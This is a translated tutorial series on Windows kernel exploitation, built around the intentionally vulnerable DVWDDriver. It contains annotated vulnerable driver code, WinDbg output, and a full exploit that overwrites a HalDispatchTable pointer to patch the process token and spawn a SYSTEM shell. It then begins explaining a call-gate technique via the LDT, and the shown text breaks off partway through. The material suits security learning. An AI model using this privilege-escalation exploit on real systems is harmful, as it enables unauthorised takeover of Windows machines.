P3nro5e · 2015/06/03 10:43

Source: http://poppopret.blogspot.com/2011/06/windows-kernel-exploitation-part-1.html

0x00 Overview


1. WTFBBQ?


Because of the many mitigations built into modern Windows (ASLR, DEP, SafeSEH, SEHOP, /GS…), user-mode software is becoming increasingly difficult to exploit. As a result, security issues in drivers are attracting more and more attention in the security community.

In this series of articles, I try to share the results of my exploration of kernel exploitation on Windows. There isn't a lot of online documentation on this topic, and what exists is not easy to understand, so I hope publishing these articles will help novices like myself. Of course, if you spot mistakes in these articles, please point them out in the comments.

In fact, after reading the Windows chapter of "A Guide to Kernel Exploitation" (1), in which the authors explain the classic weaknesses in drivers and how to exploit them, I decided to look into the driver it uses. This driver is called DVWDDriver, short for Damn Vulnerable Windows Driver, and it is available from the site listed in (1). To be honest, reading the book alone, without digging into the source code and some additional papers, won't give you all the practical details. That's why I'm writing these articles.

In this article I'll describe the driver and its weaknesses, and in the next articles I'll try to share my understanding of how to exploit them. Of course, I'm not inventing anything: everything described here is based on available documentation. The purpose of this series is to give a global overview of the different exploitation methods and to provide the technical details, with annotated source code.

2. Damn Vulnerable Windows Driver


DVWDDriver handles three different IOCTLs (I/O Control Codes):

  • DEVICEIO_DVWD_STORE: copies a user-mode buffer into a global structure kept by the KMD (kernel-mode driver).

  • DEVICEIO_DVWD_OVERWRITE: retrieves the stored buffer, by copying it from kernel memory into the buffer at the address given by the caller. No check is done on that address, and as you will see, that is a weakness.

  • DEVICEIO_DVWD_STACKOVERFLOW: copies the buffer passed as a parameter into a local buffer.

The first IOCTL is handled by DvwdHandleIoctlStore(), which calls the TriggerStore() function. That function first uses ProbeForRead() to check that the pointer to the structure ({buffer, size}) refers to a user-mode address. It then calls SetSavedData() to copy the contents of the buffer into the buffer of the global structure (in kernel memory, of course). Before copying, SetSavedData() calls ProbeForRead() again, this time on the buffer pointer, to check that the buffer is also in user mode.

The second IOCTL is handled by DvwdHandleIoctlOverwrite(), which calls the TriggerOverwrite() function. In the same way as TriggerStore(), this function checks that the structure pointer passed as an argument ({buffer, size}) refers to a user-mode address (address <= 0x7FFFFFFF on 32-bit Windows). It then calls GetSavedData() to copy the buffer of the global structure into the buffer referenced by the structure passed as a parameter. This time, however, there is no additional check to verify that the destination buffer is in user mode.

Together, the first two IOCTLs make it possible to exploit an Arbitrary Memory Overwrite weakness; the next figure shows why:

The third IOCTL is handled by DvwdHandleIoctlStackOverflow(), which calls the vulnerable TriggerOverflow() function. As we will see, this function contains a stack-based buffer overflow.
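The difference between the STORE and OVERWRITE paths can be modelled in plain user-mode C. This is only a sketch of the range check, not the driver's code: the constant `USER_PROBE_ADDRESS`, the `overwrite_req` structure and the function names are hypothetical, and the boundary value is an assumption for 32-bit Windows. The real ProbeForRead() raises an exception rather than returning a value.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed upper bound of user space on 32-bit Windows (hypothetical name). */
#define USER_PROBE_ADDRESS 0x7FFF0000u

/* True when [addr, addr + len) lies entirely below the boundary. */
bool range_is_user(uint32_t addr, uint32_t len)
{
    if (len == 0)
        return true;                 /* an empty range is always accepted */
    uint32_t last = addr + len - 1;
    if (last < addr)
        return false;                /* addr + len wrapped around 2^32 */
    return last < USER_PROBE_ADDRESS;
}

/* The {buffer, size} pair passed to the driver, with 32-bit fields. */
struct overwrite_req {
    uint32_t store_ptr;
    uint32_t size;
};

/* STORE path: the structure and the buffer it points to are both probed. */
bool store_accepts(uint32_t req_addr, const struct overwrite_req *req)
{
    assert(req != NULL);
    return range_is_user(req_addr, (uint32_t)sizeof *req) &&
           range_is_user(req->store_ptr, req->size);
}

/* OVERWRITE path: only the structure is probed; store_ptr is trusted. */
bool overwrite_accepts(uint32_t req_addr, const struct overwrite_req *req)
{
    (void)req;                       /* the pointer inside is never examined */
    return range_is_user(req_addr, (uint32_t)sizeof *req);
}
```

With a request located in user memory whose `store_ptr` is a kernel address, `store_accepts()` rejects it while `overwrite_accepts()` lets it through, which is the asymmetry the text describes.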

3. The first weakness: overwriting arbitrary memory


We have seen that the GetSavedData() function does not check whether the pointer to the destination buffer (received as a parameter) refers to user memory. The function simply copies the data stored in the global structure to that address. The problem is that the driver never checks a pointer that the user controls. So if the user-mode process supplies an arbitrary value, such as a kernel-mode address, the function ends up overwriting whatever lies at that address in kernel memory. And since the user can also write to the buffer of the KMD's global structure (with the DEVICEIO_DVWD_STORE IOCTL), we can write the data we want to the address we want. This is called an Arbitrary Memory Overwrite weakness, or write-what-where weakness.

Here is the annotated source code of the vulnerable functions:

#!c++
//=============================================================================
// Part of the KMD vulnerable to Arbitrary overwrite
//=============================================================================
#define GLOBAL_SIZE_MAX 0x100

UCHAR GlobalBuffer[GLOBAL_SIZE_MAX];
ARBITRARY_OVERWRITE_STRUCT GlobalOverwriteStruct = {&GlobalBuffer, 0};

// Copy the content located at GlobalOverwriteStruct.StorePtr to
// overwriteStruct->StorePtr (No check is performed to ensured that
// it points to userland !!!)
VOID GetSavedData(PARBITRARY_OVERWRITE_STRUCT overwriteStruct) {

    ULONG size = overwriteStruct->Size;
    PAGED_CODE();

    if(size > GlobalOverwriteStruct.Size)
        size = GlobalOverwriteStruct.Size;

    // ---- VULNERABILITY ------------------------------------------------------
    RtlCopyMemory(overwriteStruct->StorePtr, GlobalOverwriteStruct.StorePtr, size);
    // -------------------------------------------------------------------------
}

// Copy a buffer located into kernel memory into a userland buffer
//
// stream is a pointer that should address a userland structure
// type ARBITRARY_OVERWRITE_STRUCT
NTSTATUS TriggerOverwrite(UCHAR *stream) {

    ARBITRARY_OVERWRITE_STRUCT overwriteStruct;
    NTSTATUS NtStatus = STATUS_SUCCESS;
    PAGED_CODE();

    __try {
        // Initialize a ARBITRARY_OVERWRITE_STRUCT structure (in kernel land)
        RtlZeroMemory(&overwriteStruct, sizeof(ARBITRARY_OVERWRITE_STRUCT));

        // Check if the pointer given in parameter is located in userland
        // (if it's not the case, an exception is triggered)
        ProbeForRead(stream, sizeof(ARBITRARY_OVERWRITE_STRUCT), TYPE_ALIGNMENT(char));

        // Copy the ARBITRARY_OVERWRITE_STRUCT from userland to the newly
        // initialized structure located in kernel land
        RtlCopyMemory(&overwriteStruct, stream, sizeof(ARBITRARY_OVERWRITE_STRUCT));

        // Call the vulnerable function
        GetSavedData(&overwriteStruct);
    }
    __except(ExceptionFilter()) {
        NtStatus = GetExceptionCode();
        DbgPrint("[!!] Exception Triggered: Handler body: Exception Code: %d\r\n", NtStatus);
    }

    return NtStatus;
}
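To make the write-what-where primitive concrete without touching a kernel, here is a toy model in portable C. Everything in it is an assumption made for illustration: a flat array stands in for the address space, offsets below `USER_LIMIT` play the role of user memory, and the `sim_*` functions are hypothetical stand-ins for the two IOCTL paths. It also shows the check that GetSavedData() is missing; in a real driver that check would typically be a probe of the destination (for example with ProbeForWrite()) before the copy.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Toy address space: offsets below USER_LIMIT stand for user memory,
   offsets at or above it stand for kernel memory (hypothetical names). */
#define MEM_SIZE    0x200u
#define USER_LIMIT  0x100u
#define GLOBAL_MAX  0x40u

uint8_t  mem[MEM_SIZE];
uint8_t  global_buf[GLOBAL_MAX];   /* plays the role of GlobalBuffer */
uint32_t global_size;              /* plays the role of GlobalOverwriteStruct.Size */

bool in_user(uint32_t addr, uint32_t len)
{
    return addr <= USER_LIMIT && len <= USER_LIMIT - addr;
}

/* STORE: copy user data into the global buffer (the source is checked). */
bool sim_store(uint32_t src, uint32_t len)
{
    if (len > GLOBAL_MAX || !in_user(src, len))
        return false;
    memcpy(global_buf, &mem[src], len);
    global_size = len;
    return true;
}

/* OVERWRITE as in the driver: the destination is never checked. */
bool sim_overwrite_vulnerable(uint32_t dst, uint32_t len)
{
    if (len > global_size)
        len = global_size;
    assert(dst <= MEM_SIZE && len <= MEM_SIZE - dst);  /* keep the toy model in bounds */
    memcpy(&mem[dst], global_buf, len);
    return true;
}

/* OVERWRITE with the missing destination check added. */
bool sim_overwrite_checked(uint32_t dst, uint32_t len)
{
    if (len > global_size)
        len = global_size;
    if (!in_user(dst, len))
        return false;
    memcpy(&mem[dst], global_buf, len);
    return true;
}
```

Storing four bytes from a "user" offset and then calling `sim_overwrite_vulnerable()` with a "kernel" offset copies them there, while `sim_overwrite_checked()` refuses the same request.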

In the next article, we’ll see how to exploit this weakness.

4. The second vulnerability: stack-based buffer overflows


The TriggerOverflow() function only checks that the buffer it receives lies in user memory, and then copies it into a local buffer. The local buffer is only 64 bytes long. This is clearly a classic buffer overflow, because the length of the source buffer is never compared with the size of the destination. Well, it happens in kernel mode, so it is not quite so classic.

#!c++
//=============================================================================
// Part of the KMD vulnerable to Stack Overflow
//=============================================================================
#define LOCAL_BUFF 64

NTSTATUS __declspec(dllexport) TriggerOverflow(UCHAR *stream, UINT32 len) {

    char buf[LOCAL_BUFF];
    NTSTATUS NtStatus = STATUS_SUCCESS;
    PAGED_CODE();

    __try {
        // Check if stream points to userland
        ProbeForRead(stream, len, TYPE_ALIGNMENT(char));

        // ---- VULNERABILITY --------------------------------------------------
        RtlCopyMemory(buf, stream, len);
        // ---------------------------------------------------------------------
    }
    __except(ExceptionFilter()) {
        NtStatus = GetExceptionCode();
        DbgPrint("[!!] Exception Triggered: Handler body: Exception Code: %d\r\n", NtStatus);
    }

    return NtStatus;
}
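For contrast, this is a minimal sketch in portable C of the length check that TriggerOverflow() lacks. The function names `copy_bounded` and `handle_request` are hypothetical, and the code only models the logic in user mode; it is not the driver's code.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define LOCAL_BUFF 64

/* Returns 0 on success, -1 when the source would not fit in the destination. */
int copy_bounded(char *dst, size_t dst_size, const char *src, size_t len)
{
    assert(dst != NULL && src != NULL);
    if (len > dst_size)
        return -1;              /* the comparison TriggerOverflow() never makes */
    memcpy(dst, src, len);
    return 0;
}

/* Model of a handler that owns a 64-byte local buffer. */
int handle_request(const char *stream, size_t len)
{
    char buf[LOCAL_BUFF];
    return copy_bounded(buf, sizeof buf, stream, len);
}
```

A request of exactly 64 bytes is accepted and anything longer is rejected before the copy, so the saved return address next to the buffer is never reached.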

5. Test platform


The next articles will demonstrate the exploitation techniques on Windows Server 2003 SP2 (32-bit).

To load the driver quickly, the "OSR Driver Loader" tool is used here (download: http://bbs.pediy.com/showthread.php?t=100473&highlight=osr+loader).

References for 0x00

(1) A Guide to Kernel Exploitation: Attacking the Core, by Enrico Perla & Massimiliano Oldani, http://www.attackingthecore.com

(2) ProbeForRead() routine, http://msdn.microsoft.com/en-us/library/ff559876(v=vs.85).aspx

(3) OSR Driver Loader download, http://bbs.pediy.com/showthread.php?t=100473&highlight=osr+loader

0x01 Using HalDispatchTable to exploit arbitrary memory overwrite weaknesses


In this article we present one way to exploit the write-what-where weakness in DVWDDriver. The method overwrites a pointer in one of the kernel's dispatch tables. The kernel uses such tables to store various pointers. Examples of such tables:

  • SSDT (System Service Descriptor Table), nt!KeServiceDescriptorTable: stores the addresses of the system calls. The kernel uses it to dispatch system calls (more on that in (1)).

  • HAL Dispatch Table, nt!HalDispatchTable: the HAL (Hardware Abstraction Layer) is a software layer that isolates the operating system from the hardware. Basically, it allows the same system to run on machines with different hardware. This table stores pointers to routines used by the HAL.

Here we will overwrite a specific pointer in HalDispatchTable. Let's look at why and how.

1. NtQueryIntervalProfile() and HalDispatchTable


According to (3), NtQueryIntervalProfile() is an undocumented system call exported by ntdll.dll. It calls the KeQueryIntervalProfile() function in the kernel executable ntoskrnl.exe. If we disassemble that function, we can see the following:

So the routine whose address is stored at nt!HalDispatchTable+0x4 gets called (see the red box). If we overwrite the pointer at that address, that is, the second pointer in HalDispatchTable, with the address of our shellcode and then call NtQueryIntervalProfile(), our shellcode is executed.

2. Exploitation methodology


Note: The GlobalOverwriteStruct used by the driver is a global structure used to store buffers and their size.

To exploit the Arbitrary Memory Overwrite weakness, the basic idea is:

1. Use the DEVICEIO_DVWD_STORE IOCTL of DVWDDriver to store the address of our shellcode in the buffer of the GlobalOverwriteStruct structure (in kernel memory). Remember that the address we pass as an argument must be in the user address space (address <= 0x7FFFFFFF on 32-bit Windows), because the IOCTL handler checks it with ProbeForRead(). No problem: we just pass a pointer to a variable holding our shellcode's address (which is of course in user memory). The structure passed to the driver therefore contains this pointer, and the buffer size is 4 bytes.

2. Then use the DEVICEIO_DVWD_OVERWRITE IOCTL of DVWDDriver to write the content of the buffer stored in GlobalOverwriteStruct, that is, the shellcode address stored in the previous step, to the address passed as a parameter. Remember that the IOCTL handler performs no check on this address, so it can be anywhere, in user or kernel memory. We therefore pass the address of the second entry of HalDispatchTable, which is of course in kernel memory.

3. In summary, we abuse the DEVICEIO_DVWD_OVERWRITE IOCTL to write what we want, where we want:

  • What = address of our shellcode

  • Where = address of nt!HalDispatchTable+0x4

To exploit this kind of weakness, it is important to understand which of the two components we control. NB: here we can overwrite an entire address (4 bytes), but in some cases only 1 byte can be controlled. In such a scenario, we would overwrite the most significant byte of the second HalDispatchTable entry so that it becomes a user-mode address: for example, we could use 0x01. We would then need to place a NOP sled in the region 0x01000000-0x02000000 (mapped as RWX), with an instruction jumping to our shellcode at the end.
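The arithmetic behind the one-byte variant is worth spelling out. The sketch below is plain C with hypothetical function names and made-up sample values; it only shows how replacing the most significant byte of a 32-bit pointer maps any kernel pointer into the 0x01000000-0x01FFFFFF range, and which byte of the table entry holds that value on little-endian x86.

```c
#include <assert.h>
#include <stdint.h>

/* Replace the most significant byte of a 32-bit pointer value. */
uint32_t patch_msb(uint32_t pointer, uint8_t new_msb)
{
    return (pointer & 0x00FFFFFFu) | ((uint32_t)new_msb << 24);
}

/* Address of the byte to overwrite: on little-endian x86 the most
   significant byte of a 4-byte value is stored last. */
uint32_t msb_address(uint32_t slot_address)
{
    assert(slot_address <= 0xFFFFFFFFu - 3u);
    return slot_address + 3u;
}
```

Because the three low bytes of the original pointer are unknown but unchanged, the patched pointer can land anywhere in a 16 MB window, which is why the whole window has to be covered by the sled.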

Hey… wait a minute! I still have to talk about the shellcode we use.

3. Shellcoding… Patching our access token and returning to ring 3


Exploiting software in kernel mode is not like exploiting it in user mode: our shellcode runs in kernel mode, and it must not make any mistake, otherwise we get a blue screen. For a local kernel exploit, the usual approach is to use the privileges of ring 0 to patch the access token of the current process, replacing its User SID with the SID of NT AUTHORITY\SYSTEM. Then we return to ring 3 as quickly as possible and pop a shell.

In Windows, access tokens (or just tokens) describe the security context of a process or thread. In particular, a token stores the User SID, the Group SIDs, and a list of privileges. Based on this information, the kernel decides whether a requested action is authorized (access control). In user space, it is possible to get a handle to a token. More information about handles is given in (4). Here is the _TOKEN structure used to describe an access token:

#!c++
kd> dt nt!_token
   +0x000 TokenSource      : _TOKEN_SOURCE
   +0x010 TokenId          : _LUID
   +0x018 AuthenticationId : _LUID
   +0x020 ParentTokenId    : _LUID
   +0x028 ExpirationTime   : _LARGE_INTEGER
   +0x030 TokenLock        : Ptr32 _ERESOURCE
   +0x038 AuditPolicy      : _SEP_AUDIT_POLICY
   +0x040 ModifiedId       : _LUID
   +0x048 SessionId        : Uint4B
   +0x04c UserAndGroupCount : Uint4B
   +0x050 RestrictedSidCount : Uint4B
   +0x054 PrivilegeCount   : Uint4B
   +0x058 VariableLength   : Uint4B
   +0x05c DynamicCharged   : Uint4B
   +0x060 DynamicAvailable : Uint4B
   +0x064 DefaultOwnerIndex : Uint4B
   +0x068 UserAndGroups    : Ptr32 _SID_AND_ATTRIBUTES
   +0x06c RestrictedSids   : Ptr32 _SID_AND_ATTRIBUTES
   +0x070 PrimaryGroup     : Ptr32 Void
   +0x074 Privileges       : Ptr32 _LUID_AND_ATTRIBUTES
   +0x078 DynamicPart      : Ptr32 Uint4B
   +0x07c DefaultDacl      : Ptr32 _ACL
   +0x080 TokenType        : _TOKEN_TYPE
   +0x084 ImpersonationLevel : _SECURITY_IMPERSONATION_LEVEL
   +0x088 TokenFlags       : UChar
   +0x089 TokenInUse       : UChar
   +0x08c ProxyData        : Ptr32 _SECURITY_TOKEN_PROXY_DATA
   +0x090 AuditData        : Ptr32 _SECURITY_TOKEN_AUDIT_DATA
   +0x094 LogonSession     : Ptr32 _SEP_LOGON_SESSION_REFERENCES
   +0x098 OriginatingLogonSession : _LUID
   +0x0a0 VariablePart     : Uint4B

The list of pointers to SIDs is stored in UserAndGroups (of type _SID_AND_ATTRIBUTES). We can retrieve the information contained in a token as follows:

#!c++
kd> !process 0004
Searching for Process with Cid == 4
Cid handle table at e1ed7000 with 428 entries in use
PROCESS 827a6648  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00587000  ObjectTable: e1000c60  HandleCount: 388.
    Image: System
    VadRoot 82337238 Vads 4 Clone 0 Private 3. Modified 5664. Locked 0.
    DeviceMap e1001070
    Token                             e1001720
    ElapsedTime                       00:37:34.750
    UserTime                          00:00:00.000
    KernelTime                        00:00:01.578
    QuotaPoolUsage[PagedPool]         0
    QuotaPoolUsage[NonPagedPool]      0
    Working Set Sizes (now,min,max)  (43, 0, 345) (172KB, 0KB, 1380KB)
    PeakWorkingSetSize                526
    VirtualSize                       1 Mb
    PeakVirtualSize                   2 Mb
    PageFaultCount                    4829
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      8

kd> !token e1001720
_TOKEN e1001720
TS Session ID: 0
User: S-1-5-18
Groups:
 00 S-1-5-32-544
    Attributes - Default Enabled Owner
 01 S-1-1-0
    Attributes - Mandatory Default Enabled
 02 S-1-5-11
    Attributes - Mandatory Default Enabled
Primary Group: S-1-5-18
Privs:
 00 0x000000007 SeTcbPrivilege                    Attributes - Enabled Default
 01 0x000000002 SeCreateTokenPrivilege            Attributes -
 02 0x000000009 SeTakeOwnershipPrivilege          Attributes -
[...]

So the idea is basically to replace the pointer to the SID of the process owner with a pointer to the built-in NT AUTHORITY\SYSTEM SID (S-1-5-18). It is also possible to patch the group SID BUILTIN\Users (S-1-5-32-545) with the group SID BUILTIN\Administrators (S-1-5-32-544). The source code is in shellcode32.c (extracted from DVWDDriver). I've added a number of comments to make it easier to understand.

4. Summary…


In the exploitation phase, this is what we need to do:

  1. Load the kernel executable ntoskrnl.exe in user mode to get the offset of HalDispatchTable, then compute its address in kernel space.
  2. Retrieve the address of our shellcode, that is, the address of the function that patches the access token. It is worth noting, however, that the routine whose pointer we overwrite in HalDispatchTable takes four arguments (four values are pushed onto the stack before the call dword ptr [nt!HalDispatchTable+0x4]). So, for compatibility, we use a shellcode function that also takes four arguments.
  3. Retrieve the address of the NtQueryIntervalProfile() system call in ntdll.dll.
  4. Overwrite the pointer at nt!HalDispatchTable+0x4 with the address of our shellcode function (the function with 4 arguments that patches the token of the process). This is done by sending two IOCTLs, calling DeviceIoControl() twice in succession: DEVICEIO_DVWD_STORE and then DEVICEIO_DVWD_OVERWRITE, as explained in Figure 2.
  5. Call NtQueryIntervalProfile() to trigger the shellcode.
  6. Of course… at this point the process is running as the SYSTEM user, so we can pop a shell or do whatever we want!
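Step 1 boils down to a rebasing calculation, sketched here in plain C. The function names and the sample addresses are hypothetical, and how the two base addresses are obtained is outside this sketch; it only assumes that the symbol keeps the same offset from the image base in the user-mode copy and in the running kernel.

```c
#include <assert.h>
#include <stdint.h>

/* Translate the address of a symbol found in a user-mode mapping of the
   kernel image into its address in the running kernel. */
uint32_t rebase_symbol(uint32_t user_symbol, uint32_t user_base, uint32_t kernel_base)
{
    assert(user_symbol >= user_base);   /* the symbol lies inside the image */
    return kernel_base + (user_symbol - user_base);
}

/* Address of the second HalDispatchTable entry (pointers are 4 bytes wide
   on the 32-bit target). */
uint32_t second_entry(uint32_t hal_dispatch_table)
{
    return hal_dispatch_table + 4u;
}
```

For instance, with a user-mode copy loaded at 0x00400000, the symbol found at 0x0048E078 and a kernel base of 0x80800000 (all made-up values), the table is at 0x8088E078 and the target of the overwrite is 0x8088E07C.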

The following is the global overview given in (2) :

5. Exploit code


This is the exploit code developed by the author of DVWDDriver. While reading it, I added many comments to make sure I understood all of it. With the explanations above it should be easy to follow; there is nothing more to note here =)

#!c++
// ----------------------------------------------------------------------------
// Arbitrary Memory Overwrite exploitation ------------------------------------
// ---- HalDispatchTable pointer overwrite method -----------------------------
// ----------------------------------------------------------------------------

// Overwrite kernel dispatch table HalDispatchTable's second entry:
// - STORE the address of the shellcode (pointer in kernelland, points to userland)
// - OVERWRITE the second pointer in the HalDispatchTable with the address of the shellcode
BOOL OverwriteHalDispatchTable(ULONG_PTR HalDispatchTableTarget, ULONG_PTR ShellcodeAddrStorage) {

    HANDLE hFile;
    BOOL ret;
    DWORD dwReturn;
    ARBITRARY_OVERWRITE_STRUCT overwrite;

    // Open handle to the driver
    hFile = CreateFile(L"\\\\.\\DVWD", GENERIC_READ | GENERIC_WRITE,
                       FILE_SHARE_WRITE | FILE_SHARE_READ | FILE_SHARE_DELETE,
                       NULL, OPEN_EXISTING, 0, NULL);

    if(hFile != INVALID_HANDLE_VALUE) {

        // DEVICEIO_DVWD_STORE
        // -> store the address of the shellcode into kernelland (GlobalOverwriteStruct)
        overwrite.Size = 4;
        overwrite.StorePtr = (PVOID)&ShellcodeAddrStorage;
        ret = DeviceIoControl(hFile, DEVICEIO_DVWD_STORE, &overwrite, 0, NULL, 0, &dwReturn, NULL);

        // DEVICEIO_DVWD_OVERWRITE
        // -> copy the content of the buffer in kernelland (the address previously added)
        //    to the location HalDispatchTableTarget (second entry in the HalDispatchTable)
        overwrite.Size = 4;
        overwrite.StorePtr = (PVOID)HalDispatchTableTarget;
        ret = DeviceIoControl(hFile, DEVICEIO_DVWD_OVERWRITE, &overwrite, 0, NULL, 0, &dwReturn, NULL);

        CloseHandle(hFile);
        return TRUE;
    }

    return FALSE;
}

typedef NTSTATUS (__stdcall *_NtQueryIntervalProfile)(DWORD ProfileSource, PULONG Interval);

BOOL TriggerOverwrite32_NtQueryIntervalProfileWay() {

    ULONG dummy = 0;
    ULONG_PTR HalDispatchTableTarget;
    ULONG_PTR ShellcodeAddrStorage;
    _NtQueryIntervalProfile NtQueryIntervalProfile;

    // Load the Kernel Executive ntoskrnl.exe in userland and get some symbol's kernel address
    if(LoadAndGetKernelBase() == FALSE) {
        return FALSE;
    }

    // Retrieve the address of the shellcode
    ShellcodeAddrStorage = (ULONG_PTR)UserShellcodeSIDListPatchUser4Args;

    // Retrieve the address of the second entry within the HalDispatchTable
    HalDispatchTableTarget = HalDispatchTable + sizeof(ULONG_PTR);

    // Retrieve the address of the syscall NtQueryIntervalProfile within ntdll.dll
    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");

    // Overwrite the pointer in HalDispatchTable
    if(OverwriteHalDispatchTable(HalDispatchTableTarget, ShellcodeAddrStorage) == FALSE) {
        return FALSE;
    }

    // Call the function in order to launch our shellcode
    // kd> u nt!KeQueryIntervalProfile
    NtQueryIntervalProfile(2, &dummy);

    if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
        wprintf(L"Error: unable to spawn process, Error: %d\n", GetLastError());
        return FALSE;
    }

    return TRUE;
}

6. w00t ?


Then try the exploit:

DVWDExploit.exe --exploit-overwrite-profile-32

References for 0x01


(1) SSDT, Uninformed article, http://uninformed.org/index.cgi?v=8&a=2&p=10

(2) Exploiting Common Flaws in Drivers, by Ruben Santamarta, http://reversemode.com/index.php?option=com_content&task=view&id=38&Itemid=1

(3) NtQueryIntervalProfile(), http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/Profile/NtQueryIntervalProfile.html

(4) Windows Internals, book by Mark Russinovich & David Solomon

0x02 Exploiting Arbitrary Memory Overwrite Weakness with LDT


In the previous article we saw one way to exploit the write-what-where weakness in DVWDDriver, based on overwriting a pointer in the kernel's HalDispatchTable. That technique relies on an undocumented system call, which is a drawback: nothing guarantees that the call will still exist after the next system update. The technique described in this article is instead based on hardware-specific structures, the GDT and the LDT, which stay the same across the different versions of Windows.

First, we need some background on the GDT and the LDT, so we'll turn to the Intel manuals =)

1. Windows GDT and LDT


According to the Intel manual (2), segmentation is implemented using segment selectors (16-bit values). A logical address consists of:

  • An offset, a 32-bit value,
  • A segment selector, a 16-bit value.

Here is a global summary of the segmentation and paging mechanisms (logical address -> linear address -> physical address):

The figure above shows how logical addresses are translated into linear addresses (through segmentation). Then comes the paging mechanism, which translates linear addresses into physical addresses. Paging is an optional feature of Intel processors; when it is not used, linear address == physical address. Windows uses paging, so a linear address is just another structure, divided into three components. The values of those components are used as offsets into tables to obtain the physical address.
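The three components of a linear address can be extracted with a few shifts and masks. The sketch below assumes classic 32-bit paging with 4 KB pages and no PAE (10-bit directory index, 10-bit table index, 12-bit offset); the structure and function names are hypothetical, and a system running with PAE enabled splits the address differently.

```c
#include <assert.h>
#include <stdint.h>

struct linear_parts {
    uint32_t directory;   /* bits 31..22: index into the page directory */
    uint32_t table;       /* bits 21..12: index into the page table */
    uint32_t offset;      /* bits 11..0 : byte offset inside the 4 KB page */
};

/* Split a 32-bit linear address into its three paging components. */
struct linear_parts split_linear(uint32_t linear)
{
    struct linear_parts p;
    p.directory = linear >> 22;
    p.table     = (linear >> 12) & 0x3FFu;
    p.offset    = linear & 0xFFFu;
    return p;
}

/* Reassemble the three fields; the result equals the original address. */
uint32_t join_linear(struct linear_parts p)
{
    assert(p.directory < 1024u && p.table < 1024u && p.offset < 4096u);
    return (p.directory << 22) | (p.table << 12) | p.offset;
}
```

For the address 0x80123456 this gives directory index 0x200, table index 0x123 and page offset 0x456.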

We can also see that the segment selector refers to an entry in a table, and that this entry describes a segment in the linear address space (a segment descriptor): that table is the GDT. Okay, but how does it work? And what about the LDT? Let's go back to the Intel manual…

The GDT (Global Descriptor Table) and the LDT (Local Descriptor Table) are the two types of segment descriptor tables. We can also take a look at this diagram:

A GDT must be created at every system startup. Each processor in the system has a single GDT (hence the name "global" table), which can be shared by all the tasks on the system. An LDT, in contrast, can be used by a single task or by a group of related tasks, but it is optional. An LDT is described by a single GDT entry (specific to a process), which means that this entry in the GDT is replaced during a process context switch.

In more detail, the GDT generally contains:

  • A pair of kernel-mode code and data segment descriptors, with DPL=0 (the DPL, Descriptor Privilege Level, defines the privilege required to access the referenced segment)
  • A pair of user-mode code and data segment descriptors, with DPL=3
  • One TSS (Task State Segment), with DPL=0. See (3)
  • Three additional data segment entries
  • An optional LDT entry

By default, a new process has no LDT, but one can be allocated if the process asks for it. If a process has an LDT, its descriptor is found in the LdtDescriptor field of the kernel structure _KPROCESS of that process, as shown below.

#!c++
kd> dt nt!_kprocess
   +0x000 Header           : _DISPATCHER_HEADER
   +0x010 ProfileListHead  : _LIST_ENTRY
   +0x018 DirectoryTableBase : [2] Uint4B
   +0x020 LdtDescriptor    : _KGDTENTRY
   +0x028 Int21Descriptor  : _KIDTENTRY
[...]

2. Call-Gate


Call-gates give access to code segments with different privilege levels: they facilitate controlled transfers of program control between privilege levels. They are typically used only by operating systems or executives that use the privilege-level protection mechanism.

A call-gate is an entry in the GDT or in an LDT. It is a special kind of descriptor (called a call-gate descriptor). It has the same size as a segment descriptor (8 bytes), but its fields are not laid out in the same way. The following figure is from (1) and clearly shows the differences:

In fact, a call-gate is useful for jumping to a different segment, or to a ring with different privileges. When a call-gate is called, the following happens:

  1. The processor accesses the call-gate descriptor,
  2. It uses the segment selector contained in the call-gate to locate the descriptor of the code segment we ultimately want to reach,
  3. It retrieves the base address from that segment descriptor and adds to it the offset stored in the call-gate descriptor,
  4. It obtains the linear address of the code to execute (linear address = base address of the segment + offset).

Article (4) explains how to add a call-gate that lets us run code in ring 0 from ring 3. I'm not going to repeat what that good article already says; here is just what will be useful to us:

  • The "Segment Selector" field of the call-gate must reference the descriptor of the segment our payload will execute in. Because we want it to execute in ring 0 with full privileges, it must reference the kernel code segment (CS) descriptor. The correct value is 0x0008.
  • If we want to reach the call-gate from user mode, "DPL" must be equal to 3.
  • "Offset" must be the address of the code we want to execute.
  • Because this is a call-gate, "Type" must be equal to 12.
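The four field values listed above determine the 8 raw bytes of the descriptor. The following portable C sketch packs them by hand, following the 32-bit call-gate layout in the Intel manuals; the function name `encode_call_gate` and the sample offset are hypothetical, and the exploit itself fills a bit-field structure instead of a byte array.

```c
#include <assert.h>
#include <stdint.h>

/* Encode a 32-bit call-gate descriptor into its 8 raw bytes. */
void encode_call_gate(uint8_t out[8], uint32_t offset, uint16_t selector,
                      uint8_t dpl, uint8_t param_count)
{
    assert(dpl <= 3 && param_count <= 31);
    out[0] = (uint8_t)(offset & 0xFFu);              /* offset bits 7..0   */
    out[1] = (uint8_t)((offset >> 8) & 0xFFu);       /* offset bits 15..8  */
    out[2] = (uint8_t)(selector & 0xFFu);            /* target code segment selector */
    out[3] = (uint8_t)(selector >> 8);
    out[4] = param_count;                            /* bits 4..0, upper bits reserved */
    out[5] = (uint8_t)(0x80u | (dpl << 5) | 0x0Cu);  /* P=1, DPL, S=0, Type=12 */
    out[6] = (uint8_t)((offset >> 16) & 0xFFu);      /* offset bits 23..16 */
    out[7] = (uint8_t)(offset >> 24);                /* offset bits 31..24 */
}
```

With selector 0x0008, DPL 3 and no parameters, the access byte comes out as 0xEC, and the offset is split between the first two and the last two bytes of the descriptor.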

After that, we need to know how to call our call-gate…

First, we use the x86 FAR CALL instruction (opcode 0x9A). It differs from a normal CALL because we have to specify both an offset (32 bits) and a segment selector (16 bits). In our case, only the segment selector needs the right value; the offset can be left at 0x00000000, since the processor ignores it when the selector designates a call-gate. Of course, two steps are involved here: the far call first reaches the call-gate descriptor, and the call-gate descriptor then points to the code we want to execute. Let's look at how to build the segment selector:

So:

